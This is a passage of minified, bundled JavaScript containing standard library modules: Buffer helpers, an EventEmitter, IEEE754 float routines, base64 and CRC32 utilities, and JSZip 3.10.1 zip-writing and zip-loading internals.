He.ERR_INVALID_ARG_TYPE(We,"number",xe)}function ze(xe,We,Je){throw Math.floor(xe)!==xe?(Ve(xe,Je),new He.ERR_OUT_OF_RANGE(Je||"offset","an integer",xe)):We<0?new He.ERR_BUFFER_OUT_OF_BOUNDS:new He.ERR_OUT_OF_RANGE(Je||"offset",`>= ${Je?1:0} and <= ${We}`,xe)}Be("ERR_BUFFER_OUT_OF_BOUNDS",function(xe){return xe?`${xe} is outside of buffer bounds`:"Attempt to access memory outside buffer bounds"},RangeError),Be("ERR_INVALID_ARG_TYPE",function(xe,We){return`The "${xe}" argument must be of type number. Received type ${typeof We}`},TypeError),Be("ERR_OUT_OF_RANGE",function(xe,We,Je){let Oe=`The value of "${xe}" is out of range.`,Te=Je;return Number.isInteger(Je)&&Math.abs(Je)>4294967296?Te=qe(String(Je)):"bigint"==typeof Je&&(Te=String(Je),(Je>Lo(BigInt(2),BigInt(32))||Je<-Lo(BigInt(2),BigInt(32)))&&(Te=qe(Te)),Te+="n"),Oe+=` It must be ${We}. Received ${Te}`,Oe},RangeError);const me=/[^+/0-9A-Za-z-_]/g;function Ke(xe,We){let Je;We=We||1/0;const Oe=xe.length;let Te=null;const Le=[];for(let $e=0;$e<Oe;++$e){if(Je=xe.charCodeAt($e),Je>55295&&Je<57344){if(!Te){if(Je>56319){(We-=3)>-1&&Le.push(239,191,189);continue}if($e+1===Oe){(We-=3)>-1&&Le.push(239,191,189);continue}Te=Je;continue}if(Je<56320){(We-=3)>-1&&Le.push(239,191,189),Te=Je;continue}Je=65536+(Te-55296<<10|Je-56320)}else Te&&(We-=3)>-1&&Le.push(239,191,189);if(Te=null,Je<128){if((We-=1)<0)break;Le.push(Je)}else if(Je<2048){if((We-=2)<0)break;Le.push(Je>>6|192,63&Je|128)}else if(Je<65536){if((We-=3)<0)break;Le.push(Je>>12|224,Je>>6&63|128,63&Je|128)}else{if(!(Je<1114112))throw new Error("Invalid code point");if((We-=4)<0)break;Le.push(Je>>18|240,Je>>12&63|128,Je>>6&63|128,63&Je|128)}}return Le}function rt(xe){return g.toByteArray(function(We){if((We=(We=We.split("=")[0]).trim().replace(me,"")).length<2)return"";for(;We.length%4!=0;)We+="=";return We}(xe))}function Ge(xe,We,Je,Oe){let Te;for(Te=0;Te<Oe&&!(Te+Je>=We.length||Te>=xe.length);++Te)We[Te+Je]=xe[Te];return Te}function Qe(xe,We){return xe instanceof We||null!=xe&&null!=xe.constructor&&null!=xe.constructor.name&&xe.constructor.name===We.name}function ht(xe){return xe!=xe}const mt=function(){const xe="0123456789abcdef",We=new Array(256);for(let Je=0;Je<16;++Je){const Oe=16*Je;for(let Te=0;Te<16;++Te)We[Oe+Te]=xe[Je]+xe[Te]}return We}();function lt(xe){return"undefined"==typeof BigInt?ft:xe}function ft(){throw new Error("BigInt not supported")}},7187:Q=>{"use strict";var F,E="object"==typeof Reflect?Reflect:null,g=E&&"function"==typeof E.apply?E.apply:function(ee,se,ve){return Function.prototype.apply.call(ee,se,ve)};F=E&&"function"==typeof E.ownKeys?E.ownKeys:Object.getOwnPropertySymbols?function(ee){return Object.getOwnPropertyNames(ee).concat(Object.getOwnPropertySymbols(ee))}:function(ee){return Object.getOwnPropertyNames(ee)};var b=Number.isNaN||function(ee){return ee!=ee};function _(){_.init.call(this)}Q.exports=_,Q.exports.once=function(ee,se){return new Promise(function(ve,le){function ye(l){ee.removeListener(se,z),le(l)}function z(){"function"==typeof ee.removeListener&&ee.removeListener("error",ye),ve([].slice.call(arguments))}var l;K(ee,se,z,{once:!0}),"error"!==se&&("function"==typeof(l=ee).on&&K(l,"error",ye,{once:!0}))})},_.EventEmitter=_,_.prototype._events=void 0,_.prototype._eventsCount=0,_.prototype._maxListeners=void 0;var y=10;function M(ee){if("function"!=typeof ee)throw new TypeError('The "listener" argument must be of type Function. Received type '+typeof ee)}function p(ee){return void 0===ee._maxListeners?_.defaultMaxListeners:ee._maxListeners}function D(ee,se,ve,le){var ye,z,l;if(M(ve),void 0===(z=ee._events)?(z=ee._events=Object.create(null),ee._eventsCount=0):(void 0!==z.newListener&&(ee.emit("newListener",se,ve.listener?ve.listener:ve),z=ee._events),l=z[se]),void 0===l)l=z[se]=ve,++ee._eventsCount;else if("function"==typeof l?l=z[se]=le?[ve,l]:[l,ve]:le?l.unshift(ve):l.push(ve),(ye=p(ee))>0&&l.length>ye&&!l.warned){l.warned=!0;var A=new Error("Possible EventEmitter memory leak detected. "+l.length+" "+String(se)+" listeners added. Use emitter.setMaxListeners() to increase limit");A.name="MaxListenersExceededWarning",A.emitter=ee,A.type=se,A.count=l.length,console&&console.warn&&console.warn(A)}return ee}function w(){if(!this.fired)return this.target.removeListener(this.type,this.wrapFn),this.fired=!0,0===arguments.length?this.listener.call(this.target):this.listener.apply(this.target,arguments)}function x(ee,se,ve){var le={fired:!1,wrapFn:void 0,target:ee,type:se,listener:ve},ye=w.bind(le);return ye.listener=ve,le.wrapFn=ye,ye}function S(ee,se,ve){var le=ee._events;if(void 0===le)return[];var ye=le[se];return void 0===ye?[]:"function"==typeof ye?ve?[ye.listener||ye]:[ye]:ve?function(z){for(var l=new Array(z.length),f=0;f<l.length;++f)l[f]=z[f].listener||z[f];return l}(ye):U(ye,ye.length)}function O(ee){var se=this._events;if(void 0!==se){var ve=se[ee];if("function"==typeof ve)return 1;if(void 0!==ve)return ve.length}return 0}function U(ee,se){for(var ve=new Array(se),le=0;le<se;++le)ve[le]=ee[le];return ve}function K(ee,se,ve,le){if("function"==typeof ee.on)le.once?ee.once(se,ve):ee.on(se,ve);else{if("function"!=typeof ee.addEventListener)throw new TypeError('The "emitter" argument must be of type EventEmitter. Received type '+typeof ee);ee.addEventListener(se,function ye(z){le.once&&ee.removeEventListener(se,ye),ve(z)})}}Object.defineProperty(_,"defaultMaxListeners",{enumerable:!0,get:function(){return y},set:function(ee){if("number"!=typeof ee||ee<0||b(ee))throw new RangeError('The value of "defaultMaxListeners" is out of range. It must be a non-negative number. Received '+ee+".");y=ee}}),_.init=function(){void 0!==this._events&&this._events!==Object.getPrototypeOf(this)._events||(this._events=Object.create(null),this._eventsCount=0),this._maxListeners=this._maxListeners||void 0},_.prototype.setMaxListeners=function(ee){if("number"!=typeof ee||ee<0||b(ee))throw new RangeError('The value of "n" is out of range. It must be a non-negative number. Received '+ee+".");return this._maxListeners=ee,this},_.prototype.getMaxListeners=function(){return p(this)},_.prototype.emit=function(ee){for(var se=[],ve=1;ve<arguments.length;ve++)se.push(arguments[ve]);var le="error"===ee,ye=this._events;if(void 0!==ye)le=le&&void 0===ye.error;else if(!le)return!1;if(le){var z;if(se.length>0&&(z=se[0]),z instanceof Error)throw z;var l=new Error("Unhandled error."+(z?" ("+z.message+")":""));throw l.context=z,l}var f=ye[ee];if(void 0===f)return!1;if("function"==typeof f)g(f,this,se);else{var A=f.length,v=U(f,A);for(ve=0;ve<A;++ve)g(v[ve],this,se)}return!0},_.prototype.on=_.prototype.addListener=function(ee,se){return D(this,ee,se,!1)},_.prototype.prependListener=function(ee,se){return D(this,ee,se,!0)},_.prototype.once=function(ee,se){return M(se),this.on(ee,x(this,ee,se)),this},_.prototype.prependOnceListener=function(ee,se){return M(se),this.prependListener(ee,x(this,ee,se)),this},_.prototype.off=_.prototype.removeListener=function(ee,se){var ve,le,ye,z,l;if(M(se),void 0===(le=this._events))return this;if(void 0===(ve=le[ee]))return this;if(ve===se||ve.listener===se)0==--this._eventsCount?this._events=Object.create(null):(delete le[ee],le.removeListener&&this.emit("removeListener",ee,ve.listener||se));else if("function"!=typeof ve){for(ye=-1,z=ve.length-1;z>=0;z--)if(ve[z]===se||ve[z].listener===se){l=ve[z].listener,ye=z;break}if(ye<0)return this;0===ye?ve.shift():function(f,A){for(;A+1<f.length;A++)f[A]=f[A+1];f.pop()}(ve,ye),1===ve.length&&(le[ee]=ve[0]),void 0!==le.removeListener&&this.emit("removeListener",ee,l||se)}return this},_.prototype.removeAllListeners=function(ee){var se,ve,le;if(void 0===(ve=this._events))return this;if(void 0===ve.removeListener)return 0===arguments.length?(this._events=Object.create(null),this._eventsCount=0):void 0!==ve[ee]&&(0==--this._eventsCount?this._events=Object.create(null):delete ve[ee]),this;if(0===arguments.length){var ye,z=Object.keys(ve);for(le=0;le<z.length;++le)"removeListener"!==(ye=z[le])&&this.removeAllListeners(ye);return this.removeAllListeners("removeListener"),this._events=Object.create(null),this._eventsCount=0,this}if("function"==typeof(se=ve[ee]))this.removeListener(ee,se);else if(void 0!==se)for(le=se.length-1;le>=0;le--)this.removeListener(ee,se[le]);return this},_.prototype.listeners=function(ee){return S(this,ee,!0)},_.prototype.rawListeners=function(ee){return S(this,ee,!1)},_.listenerCount=function(ee,se){return"function"==typeof ee.listenerCount?ee.listenerCount(se):O.call(ee,se)},_.prototype.listenerCount=O,_.prototype.eventNames=function(){return this._eventsCount>0?F(this._events):[]}},645:(Q,F)=>{F.read=function(E,g,b,_,y){var M,p,D=8*y-_-1,w=(1<<D)-1,x=w>>1,S=-7,O=b?y-1:0,U=b?-1:1,K=E[g+O];for(O+=U,M=K&(1<<-S)-1,K>>=-S,S+=D;S>0;M=256*M+E[g+O],O+=U,S-=8);for(p=M&(1<<-S)-1,M>>=-S,S+=_;S>0;p=256*p+E[g+O],O+=U,S-=8);if(0===M)M=1-x;else{if(M===w)return p?NaN:1/0*(K?-1:1);p+=Math.pow(2,_),M-=x}return(K?-1:1)*p*Math.pow(2,M-_)},F.write=function(E,g,b,_,y,M){var p,D,w,x=8*M-y-1,S=(1<<x)-1,O=S>>1,U=23===y?Math.pow(2,-24)-Math.pow(2,-77):0,K=_?0:M-1,ee=_?1:-1,se=g<0||0===g&&1/g<0?1:0;for(g=Math.abs(g),isNaN(g)||g===1/0?(D=isNaN(g)?1:0,p=S):(p=Math.floor(Math.log(g)/Math.LN2),g*(w=Math.pow(2,-p))<1&&(p--,w*=2),(g+=p+O>=1?U/w:U*Math.pow(2,1-O))*w>=2&&(p++,w/=2),p+O>=S?(D=0,p=S):p+O>=1?(D=(g*w-1)*Math.pow(2,y),p+=O):(D=g*Math.pow(2,O-1)*Math.pow(2,y),p=0));y>=8;E[b+K]=255&D,K+=ee,D/=256,y-=8);for(p=p<<y|D,x+=y;x>0;E[b+K]=255&p,K+=ee,p/=256,x-=8);E[b+K-ee]|=128*se}},5705:(Q,F,E)=>{"use strict";var g,b,_=E.g.MutationObserver||E.g.WebKitMutationObserver;if(_){var y=0,M=new _(x),p=E.g.document.createTextNode("");M.observe(p,{characterData:!0}),g=function(){p.data=y=++y%2}}else if(E.g.setImmediate||void 0===E.g.MessageChannel)g="document"in E.g&&"onreadystatechange"in E.g.document.createElement("script")?function(){var S=E.g.document.createElement("script");S.onreadystatechange=function(){x(),S.onreadystatechange=null,S.parentNode.removeChild(S),S=null},E.g.document.documentElement.appendChild(S)}:function(){setTimeout(x,0)};else{var D=new E.g.MessageChannel;D.port1.onmessage=x,g=function(){D.port2.postMessage(0)}}var w=[];function x(){var S,O;b=!0;for(var U=w.length;U;){for(O=w,w=[],S=-1;++S<U;)O[S]();U=w.length}b=!1}Q.exports=function(S){1!==w.push(S)||b||g()}},5717:Q=>{Q.exports="function"==typeof Object.create?function(F,E){E&&(F.super_=E,F.prototype=Object.create(E.prototype,{constructor:{value:F,enumerable:!1,writable:!0,configurable:!0}}))}:function(F,E){if(E){F.super_=E;var g=function(){};g.prototype=E.prototype,F.prototype=new g,F.prototype.constructor=F}}},8458:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3790),_="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";F.encode=function(y){for(var M,p,D,x,S,O,U=[],K=0,ee=y.length,se=ee,ve="string"!==g.getTypeOf(y);K<y.length;)se=ee-K,ve?(M=y[K++],p=K<ee?y[K++]:0,D=K<ee?y[K++]:0):(M=y.charCodeAt(K++),p=K<ee?y.charCodeAt(K++):0,D=K<ee?y.charCodeAt(K++):0),x=(3&M)<<4|p>>4,S=se>1?(15&p)<<2|D>>6:64,O=se>2?63&D:64,U.push(_.charAt(M>>2)+_.charAt(x)+_.charAt(S)+_.charAt(O));return U.join("")},F.decode=function(y){var M,p,D,w,x,S,O=0,U=0,K="data:";if(y.substr(0,K.length)===K)throw new Error("Invalid base64 input, it looks like a data url.");var ee,se=3*(y=y.replace(/[^A-Za-z0-9+/=]/g,"")).length/4;if(y.charAt(y.length-1)===_.charAt(64)&&se--,y.charAt(y.length-2)===_.charAt(64)&&se--,se%1!=0)throw new Error("Invalid base64 input, bad content length.");for(ee=b.uint8array?new Uint8Array(0|se):new Array(0|se);O<y.length;)M=_.indexOf(y.charAt(O++))<<2|(w=_.indexOf(y.charAt(O++)))>>4,p=(15&w)<<4|(x=_.indexOf(y.charAt(O++)))>>2,D=(3&x)<<6|(S=_.indexOf(y.charAt(O++))),ee[U++]=M,64!==x&&(ee[U++]=p),64!==S&&(ee[U++]=D);return ee}},7326:(Q,F,E)=>{"use strict";var g=E(8565),b=E(5301),_=E(2541),y=E(5977);function M(p,D,w,x,S){this.compressedSize=p,this.uncompressedSize=D,this.crc32=w,this.compression=x,this.compressedContent=S}M.prototype={getContentWorker:function(){var p=new b(g.Promise.resolve(this.compressedContent)).pipe(this.compression.uncompressWorker()).pipe(new y("data_length")),D=this;return p.on("end",function(){if(this.streamInfo.data_length!==D.uncompressedSize)throw new Error("Bug : uncompressed data size mismatch")}),p},getCompressedWorker:function(){return new b(g.Promise.resolve(this.compressedContent)).withStreamInfo("compressedSize",this.compressedSize).withStreamInfo("uncompressedSize",this.uncompressedSize).withStreamInfo("crc32",this.crc32).withStreamInfo("compression",this.compression)}},M.createWorkerFrom=function(p,D,w){return p.pipe(new _).pipe(new y("uncompressedSize")).pipe(D.compressWorker(w)).pipe(new y("compressedSize")).withStreamInfo("compression",D)},Q.exports=M},1678:(Q,F,E)=>{"use strict";var g=E(3718);F.STORE={magic:"\0\0",compressWorker:function(){return new g("STORE compression")},uncompressWorker:function(){return new g("STORE decompression")}},F.DEFLATE=E(1033)},6988:(Q,F,E)=>{"use strict";var g=E(8910),b=function(){for(var _,y=[],M=0;M<256;M++){_=M;for(var p=0;p<8;p++)_=1&_?3988292384^_>>>1:_>>>1;y[M]=_}return y}();Q.exports=function(_,y){return void 0!==_&&_.length?"string"!==g.getTypeOf(_)?function(M,p,D,w){var x=b,S=0+D;M^=-1;for(var O=0;O<S;O++)M=M>>>8^x[255&(M^p[O])];return-1^M}(0|y,_,_.length):function(M,p,D,w){var x=b,S=0+D;M^=-1;for(var O=0;O<S;O++)M=M>>>8^x[255&(M^p.charCodeAt(O))];return-1^M}(0|y,_,_.length):0}},6032:(Q,F)=>{"use strict";F.base64=!1,F.binary=!1,F.dir=!1,F.createFolders=!0,F.date=null,F.compression=null,F.compressionOptions=null,F.comment=null,F.unixPermissions=null,F.dosPermissions=null},8565:(Q,F,E)=>{"use strict";var g;g="undefined"!=typeof Promise?Promise:E(3389),Q.exports={Promise:g}},1033:(Q,F,E)=>{"use strict";var g="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Uint32Array,b=E(9591),_=E(8910),y=E(3718),M=g?"uint8array":"array";function p(D,w){y.call(this,"FlateWorker/"+D),this._pako=null,this._pakoAction=D,this._pakoOptions=w,this.meta={}}F.magic="\b\0",_.inherits(p,y),p.prototype.processChunk=function(D){this.meta=D.meta,null===this._pako&&this._createPako(),this._pako.push(_.transformTo(M,D.data),!1)},p.prototype.flush=function(){y.prototype.flush.call(this),null===this._pako&&this._createPako(),this._pako.push([],!0)},p.prototype.cleanUp=function(){y.prototype.cleanUp.call(this),this._pako=null},p.prototype._createPako=function(){this._pako=new b[this._pakoAction]({raw:!0,level:this._pakoOptions.level||-1});var D=this;this._pako.onData=function(w){D.push({data:w,meta:D.meta})}},F.compressWorker=function(D){return new p("Deflate",D)},F.uncompressWorker=function(){return new p("Inflate",{})}},4979:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3718),_=E(3600),y=E(6988),M=E(1141),p=function(S,O){var U,K="";for(U=0;U<O;U++)K+=String.fromCharCode(255&S),S>>>=8;return K},D=function(S,O,U,K,ee,se){var ve,le,ye=S.file,z=S.compression,l=se!==_.utf8encode,f=g.transformTo("string",se(ye.name)),A=g.transformTo("string",_.utf8encode(ye.name)),v=ye.comment,P=g.transformTo("string",se(v)),G=g.transformTo("string",_.utf8encode(v)),X=A.length!==ye.name.length,L=G.length!==v.length,h="",R="",J="",Z=ye.dir,ue=ye.date,Ie={crc32:0,compressedSize:0,uncompressedSize:0};O&&!U||(Ie.crc32=S.crc32,Ie.compressedSize=S.compressedSize,Ie.uncompressedSize=S.uncompressedSize);var Ae=0;O&&(Ae|=8),l||!X&&!L||(Ae|=2048);var Ue,Xe,He=0,Be=0;Z&&(He|=16),"UNIX"===ee?(Be=798,He|=(Xe=Ue=ye.unixPermissions,Ue||(Xe=Z?16893:33204),(65535&Xe)<<16)):(Be=20,He|=63&(ye.dosPermissions||0)),ve=ue.getUTCHours(),ve<<=6,ve|=ue.getUTCMinutes(),ve<<=5,ve|=ue.getUTCSeconds()/2,le=ue.getUTCFullYear()-1980,le<<=4,le|=ue.getUTCMonth()+1,le<<=5,le|=ue.getUTCDate(),X&&(R=p(1,1)+p(y(f),4)+A,h+="up"+p(R.length,2)+R),L&&(J=p(1,1)+p(y(P),4)+G,h+="uc"+p(J.length,2)+J);var qe="";return qe+="\n\0",qe+=p(Ae,2),qe+=z.magic,qe+=p(ve,2),qe+=p(le,2),qe+=p(Ie.crc32,4),qe+=p(Ie.compressedSize,4),qe+=p(Ie.uncompressedSize,4),qe+=p(f.length,2),qe+=p(h.length,2),{fileRecord:M.LOCAL_FILE_HEADER+qe+f+h,dirRecord:M.CENTRAL_FILE_HEADER+p(Be,2)+qe+p(P.length,2)+"\0\0\0\0"+p(He,4)+p(K,4)+f+h+P}},w=function(S){return M.DATA_DESCRIPTOR+p(S.crc32,4)+p(S.compressedSize,4)+p(S.uncompressedSize,4)};function x(S,O,U,K){b.call(this,"ZipFileWorker"),this.bytesWritten=0,this.zipComment=O,this.zipPlatform=U,this.encodeFileName=K,this.streamFiles=S,this.accumulate=!1,this.contentBuffer=[],this.dirRecords=[],this.currentSourceOffset=0,this.entriesCount=0,this.currentFile=null,this._sources=[]}g.inherits(x,b),x.prototype.push=function(S){var O=S.meta.percent||0,U=this.entriesCount,K=this._sources.length;this.accumulate?this.contentBuffer.push(S):(this.bytesWritten+=S.data.length,b.prototype.push.call(this,{data:S.data,meta:{currentFile:this.currentFile,percent:U?(O+100*(U-K-1))/U:100}}))},x.prototype.openedSource=function(S){this.currentSourceOffset=this.bytesWritten,this.currentFile=S.file.name;var O=this.streamFiles&&!S.file.dir;if(O){var U=D(S,O,!1,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);this.push({data:U.fileRecord,meta:{percent:0}})}else this.accumulate=!0},x.prototype.closedSource=function(S){this.accumulate=!1;var O=this.streamFiles&&!S.file.dir,U=D(S,O,!0,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);if(this.dirRecords.push(U.dirRecord),O)this.push({data:w(S),meta:{percent:100}});else for(this.push({data:U.fileRecord,meta:{percent:0}});this.contentBuffer.length;)this.push(this.contentBuffer.shift());this.currentFile=null},x.prototype.flush=function(){for(var S=this.bytesWritten,O=0;O<this.dirRecords.length;O++)this.push({data:this.dirRecords[O],meta:{percent:100}});var ee,se,ve,z,K=(ee=this.dirRecords.length,se=this.bytesWritten-S,ve=S,z=g.transformTo("string",(0,this.encodeFileName)(this.zipComment)),M.CENTRAL_DIRECTORY_END+"\0\0\0\0"+p(ee,2)+p(ee,2)+p(se,4)+p(ve,4)+p(z.length,2)+z);this.push({data:K,meta:{percent:100}})},x.prototype.prepareNextSource=function(){this.previous=this._sources.shift(),this.openedSource(this.previous.streamInfo),this.isPaused?this.previous.pause():this.previous.resume()},x.prototype.registerPrevious=function(S){this._sources.push(S);var O=this;return S.on("data",function(U){O.processChunk(U)}),S.on("end",function(){O.closedSource(O.previous.streamInfo),O._sources.length?O.prepareNextSource():O.end()}),S.on("error",function(U){O.error(U)}),this},x.prototype.resume=function(){return!!b.prototype.resume.call(this)&&(!this.previous&&this._sources.length?(this.prepareNextSource(),!0):this.previous||this._sources.length||this.generatedError?void 0:(this.end(),!0))},x.prototype.error=function(S){var O=this._sources;if(!b.prototype.error.call(this,S))return!1;for(var U=0;U<O.length;U++)try{O[U].error(S)}catch(K){}return!0},x.prototype.lock=function(){b.prototype.lock.call(this);for(var S=this._sources,O=0;O<S.length;O++)S[O].lock()},Q.exports=x},7834:(Q,F,E)=>{"use strict";var g=E(1678),b=E(4979);F.generateWorker=function(_,y,M){var p=new b(y.streamFiles,M,y.platform,y.encodeFileName),D=0;try{_.forEach(function(w,x){D++;var S=function(ee,se){var ve=ee||se,le=g[ve];if(!le)throw new Error(ve+" is not a valid compression method !");return le}(x.options.compression,y.compression),U=x.dir,K=x.date;x._compressWorker(S,x.options.compressionOptions||y.compressionOptions||{}).withStreamInfo("file",{name:w,dir:U,date:K,comment:x.comment||"",unixPermissions:x.unixPermissions,dosPermissions:x.dosPermissions}).pipe(p)}),p.entriesCount=D}catch(w){p.error(w)}return p}},6085:(Q,F,E)=>{"use strict";function g(){if(!(this instanceof g))return new g;if(arguments.length)throw new Error("The constructor with parameters has been removed in JSZip 3.0, please check the upgrade guide.");this.files=Object.create(null),this.comment=null,this.root="",this.clone=function(){var b=new g;for(var _ in this)"function"!=typeof this[_]&&(b[_]=this[_]);return b}}(g.prototype=E(7132)).loadAsync=E(1062),g.support=E(3790),g.defaults=E(6032),g.version="3.10.1",g.loadAsync=function(b,_){return(new g).loadAsync(b,_)},g.external=E(8565),Q.exports=g},1062:(Q,F,E)=>{"use strict";var g=E(8910),b=E(8565),_=E(3600),y=E(6624),M=E(2541),p=E(2182);function D(w){return new b.Promise(function(x,S){var O=w.decompressed.getContentWorker().pipe(new M);O.on("error",function(U){S(U)}).on("end",function(){O.streamInfo.crc32!==w.decompressed.crc32?S(new Error("Corrupted zip : CRC32 mismatch")):x()}).resume()})}Q.exports=function(w,x){var S=this;return x=g.extend(x||{},{base64:!1,checkCRC32:!1,optimizedBinaryString:!1,createFolders:!1,decodeFileName:_.utf8decode}),p.isNode&&p.isStream(w)?b.Promise.reject(new Error("JSZip can't accept a stream when loading a zip file.")):g.prepareContent("the loaded zip file",w,!0,x.optimizedBinaryString,x.base64).then(function(O){var U=new y(x);return U.load(O),U}).then(function(O){var U=[b.Promise.resolve(O)],K=O.files;if(x.checkCRC32)for(var ee=0;ee<K.length;ee++)U.push(D(K[ee]));return b.Promise.all(U)}).then(function(O){for(var U=O.shift(),K=U.files,ee=0;ee<K.length;ee++){var se=K[ee],ve=se.fileNameStr,le=g.resolve(se.fileNameStr);S.file(le,se.decompressed,{binary:!0,optimizedBinaryString:!0,date:se.date,dir:se.dir,comment:se.fileCommentStr.length?se.fileCommentStr:null,unixPermissions:se.unixPermissions,dosPermissions:se.dosPermissions,createFolders:x.createFolders}),se.dir||(S.file(le).unsafeOriginalName=ve)}return U.zipComment.length&&(S.comment=U.zipComment),S})}},660:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3718);function _(y,M){b.call(this,"Nodejs stream input adapter for "+y),this._upstreamEnded=!1,this._bindStream(M)}g.inherits(_,b),_.prototype._bindStream=function(y){var M=this;this._stream=y,y.pause(),y.on("data",function(p){M.push({data:p,meta:{percent:0}})}).on("error",function(p){M.isPaused?this.generatedError=p:M.error(p)}).on("end",function(){M.isPaused?M._upstreamEnded=!0:M.end()})},_.prototype.pause=function(){return!!b.prototype.pause.call(this)&&(this._stream.pause(),!0)},_.prototype.resume=function(){return!!b.prototype.resume.call(this)&&(this._upstreamEnded?this.end():this._stream.resume(),!0)},Q.exports=_},1220:(Q,F,E)=>{"use strict";var g=E(749).Readable;function b(_,y,M){g.call(this,y),this._helper=_;var p=this;_.on("data",function(D,w){p.push(D)||p._helper.pause(),M&&M(w)}).on("error",function(D){p.emit("error",D)}).on("end",function(){p.push(null)})}E(8910).inherits(b,g),b.prototype._read=function(){this._helper.resume()},Q.exports=b},2182:Q=>{"use strict";Q.exports={isNode:void 0!==ie,newBufferFrom:function(F,E){if(ie.from&&ie.from!==Uint8Array.from)return ie.from(F,E);if("number"==typeof F)throw new Error('The "data" argument must not be a number');return new ie(F,E)},allocBuffer:function(F){if(ie.alloc)return ie.alloc(F);var E=new ie(F);return E.fill(0),E},isBuffer:function(F){return ie.isBuffer(F)},isStream:function(F){return F&&"function"==typeof F.on&&"function"==typeof F.pause&&"function"==typeof F.resume}}},7132:(Q,F,E)=>{"use strict";var g=E(3600),b=E(8910),_=E(3718),y=E(1285),M=E(6032),p=E(7326),D=E(6859),w=E(7834),x=E(2182),S=E(660),O=function(le,ye,z){var l,P,f=b.getTypeOf(ye),A=b.extend(z||{},M);A.date=A.date||new Date,null!==A.compression&&(A.compression=A.compression.toUpperCase()),"string"==typeof A.unixPermissions&&(A.unixPermissions=parseInt(A.unixPermissions,8)),A.unixPermissions&&16384&A.unixPermissions&&(A.dir=!0),A.dosPermissions&&16&A.dosPermissions&&(A.dir=!0),A.dir&&(le=K(le)),A.createFolders&&(l=U(le))&&ee.call(this,l,!0),z&&void 0!==z.binary||(A.binary=!("string"===f&&!1===A.binary&&!1===A.base64)),(ye instanceof p&&0===ye.uncompressedSize||A.dir||!ye||0===ye.length)&&(A.base64=!1,A.binary=!0,ye="",A.compression="STORE",f="string"),P=ye instanceof p||ye instanceof _?ye:x.isNode&&x.isStream(ye)?new S(le,ye):b.prepareContent(le,ye,A.binary,A.optimizedBinaryString,A.base64);var G=new D(le,P,A);this.files[le]=G},U=function(le){"/"===le.slice(-1)&&(le=le.substring(0,le.length-1));var ye=le.lastIndexOf("/");return ye>0?le.substring(0,ye):""},K=function(le){return"/"!==le.slice(-1)&&(le+="/"),le},ee=function(le,ye){return ye=void 0!==ye?ye:M.createFolders,le=K(le),this.files[le]||O.call(this,le,null,{dir:!0,createFolders:ye}),this.files[le]};function se(le){return"[object RegExp]"===Object.prototype.toString.call(le)}var ve={load:function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},forEach:function(le){var ye,z,l;for(ye in this.files)l=this.files[ye],(z=ye.slice(this.root.length,ye.length))&&ye.slice(0,this.root.length)===this.root&&le(z,l)},filter:function(le){var ye=[];return this.forEach(function(z,l){le(z,l)&&ye.push(l)}),ye},file:function(le,ye,z){if(1===arguments.length){if(se(le)){var l=le;return this.filter(function(A,v){return!v.dir&&l.test(A)})}var f=this.files[this.root+le];return f&&!f.dir?f:null}return O.call(this,le=this.root+le,ye,z),this},folder:function(le){if(!le)return this;if(se(le))return this.filter(function(f,A){return A.dir&&le.test(f)});var z=ee.call(this,this.root+le),l=this.clone();return l.root=z.name,l},remove:function(le){var ye=this.files[le=this.root+le];if(ye||("/"!==le.slice(-1)&&(le+="/"),ye=this.files[le]),ye&&!ye.dir)delete this.files[le];else for(var z=this.filter(function(f,A){return A.name.slice(0,le.length)===le}),l=0;l<z.length;l++)delete this.files[z[l].name];return this},generate:function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},generateInternalStream:function(le){var ye,z={};try{if((z=b.extend(le||{},{streamFiles:!1,compression:"STORE",compressionOptions:null,type:"",platform:"DOS",comment:null,mimeType:"application/zip",encodeFileName:g.utf8encode})).type=z.type.toLowerCase(),z.compression=z.compression.toUpperCase(),"binarystring"===z.type&&(z.type="string"),!z.type)throw new Error("No output type specified.");b.checkSupport(z.type),"darwin"!==z.platform&&"freebsd"!==z.platform&&"linux"!==z.platform&&"sunos"!==z.platform||(z.platform="UNIX"),"win32"===z.platform&&(z.platform="DOS"),ye=w.generateWorker(this,z,z.comment||this.comment||"")}catch(f){(ye=new _("error")).error(f)}return new y(ye,z.type||"string",z.mimeType)},generateAsync:function(le,ye){return this.generateInternalStream(le).accumulate(ye)},generateNodeStream:function(le,ye){return(le=le||{}).type||(le.type="nodebuffer"),this.generateInternalStream(le).toNodejsStream(ye)}};Q.exports=ve},749:(Q,F,E)=>{"use strict";Q.exports=E(2830)},2370:(Q,F,E)=>{"use strict";var g=E(8542);function b(_){g.call(this,_);for(var y=0;y<this.data.length;y++)_[y]=255&_[y]}E(8910).inherits(b,g),b.prototype.byteAt=function(_){return this.data[this.zero+_]},b.prototype.lastIndexOfSignature=function(_){for(var y=_.charCodeAt(0),M=_.charCodeAt(1),p=_.charCodeAt(2),D=_.charCodeAt(3),w=this.length-4;w>=0;--w)if(this.data[w]===y&&this.data[w+1]===M&&this.data[w+2]===p&&this.data[w+3]===D)return w-this.zero;return-1},b.prototype.readAndCheckSignature=function(_){var y=_.charCodeAt(0),M=_.charCodeAt(1),p=_.charCodeAt(2),D=_.charCodeAt(3),w=this.readData(4);return y===w[0]&&M===w[1]&&p===w[2]&&D===w[3]},b.prototype.readData=function(_){if(this.checkOffset(_),0===_)return[];var y=this.data.slice(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},Q.exports=b},8542:(Q,F,E)=>{"use strict";var g=E(8910);function b(_){this.data=_,this.length=_.length,this.index=0,this.zero=0}b.prototype={checkOffset:function(_){this.checkIndex(this.index+_)},checkIndex:function(_){if(this.length<this.zero+_||_<0)throw new Error("End of data reached (data length = "+this.length+", asked index = "+_+"). Corrupted zip ?")},setIndex:function(_){this.checkIndex(_),this.index=_},skip:function(_){this.setIndex(this.index+_)},byteAt:function(){},readInt:function(_){var y,M=0;for(this.checkOffset(_),y=this.index+_-1;y>=this.index;y--)M=(M<<8)+this.byteAt(y);return this.index+=_,M},readString:function(_){return 